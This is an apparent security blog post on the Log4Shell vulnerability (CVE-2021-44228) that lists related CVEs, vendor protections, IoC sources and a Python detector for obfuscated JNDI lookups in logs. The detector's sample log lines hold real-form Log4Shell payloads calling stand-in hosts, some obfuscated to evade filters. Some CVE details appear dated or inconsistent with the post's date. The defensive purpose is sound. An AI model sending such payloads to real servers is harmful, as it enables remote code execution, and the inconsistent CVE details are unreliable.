Saturday, December 11, 2021

Log4j vulnerability (aka, Log4Shell, CVE-2021-44228) Updates


  • Advisory

The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system.

CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.

At this point, four CVEs have been released regarding the Log4j vulnerability (aka Log4Shell, CVE-2021-44228):
- CVE-2021-44228 (CVSS 10.0, Critical): the original zero-day, a vulnerability that allows an attacker to achieve remote code execution (RCE) through log messages in Log4j 2.x.
- CVE-2021-45046 (CVSS 3.7, Low): a vulnerability that allows an attacker to cause a Denial of Service (DoS) through log messages, aka the “incomplete fix.”
- CVE-2021-45105 (CVSS 7.5, High): Apache Log4j is prone to a Denial-of-Service (DoS) vulnerability while parsing certain crafted HTTP requests.
- CVE-2021-4104 (CVSS 8.1, High): a vulnerability found in JMSAppender, another component of Log4j, that allows remote code execution (RCE) through log messages.
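The RCE and "incomplete fix" entries above hinge on attacker-controlled text reaching a log message where Log4j evaluates `${...}` lookups. As an added example (not from the original post or any vendor), the Python below scans constructed web-server log lines for a `${jndi:` lookup and first collapses the nested `${lower:...}`, `${upper:...}` and `${...:-default}` fragments that are used to break up the literal token, so that a detector does not miss them. The sample lines, IPs and `example.invalid` hostnames are constructed.

```python
import re

# Constructed sample access-log lines: one benign request, three carrying a lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [11/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"',
]

# Innermost lookups of the form ${lower:X} / ${upper:X} (group 1) or
# ${key:-default} with any key, including the empty one (group 2).
_SIMPLE_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^}$]*)\}|\$\{[^}$]*?:-([^}$]*)\}", re.IGNORECASE
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(text: str) -> str:
    """Replace nested lookups by their plain text until nothing changes, then lowercase."""
    prev = None
    while prev != text:
        prev = text
        text = _SIMPLE_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text.lower()


def is_log4shell_attempt(line: str) -> bool:
    """True when the normalized line contains a JNDI lookup."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {norm}")
```

The loop in `normalize` matters: a single pass would unwrap only the innermost layer, so a detector that matches on the raw line alone would see lines 2 and 3 as clean.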


▶ CISA's Apache Log4j Vulnerability Guidance

* Reference articles:


  • Vulnerability Details

<Image from govcert>

  • Scanner

  • Security Vendors

▶ Palo Alto Networks
Next-Generation Firewalls with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using the following Threat IDs:
- 91991 (initially released using Applications and Threat content update version 8498 and further enhanced with version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.
- 91994 and 91995 (released using Applications and Threat content version 8500).

▶ Fortinet

▶ IBM

▶ Splunk


  • Indicators of Compromise (IoCs)

Members of the Curated Intelligence Trust Group have compiled a list of IoC feeds and threat reports focused on the recent Log4Shell exploitation of CVE-2021-44228 in Log4j.

▶ GreyNoise is providing IoCs for CVE-2021-44228 Apache Log4j RCE attempts on GitHub.
C2/Callback domains here.
Latest IPs here.

▶ Microsoft
Microsoft Threat Intelligence Center (MSTIC) has provided a list of IoCs related to this attack and will update it with new indicators as they are discovered.
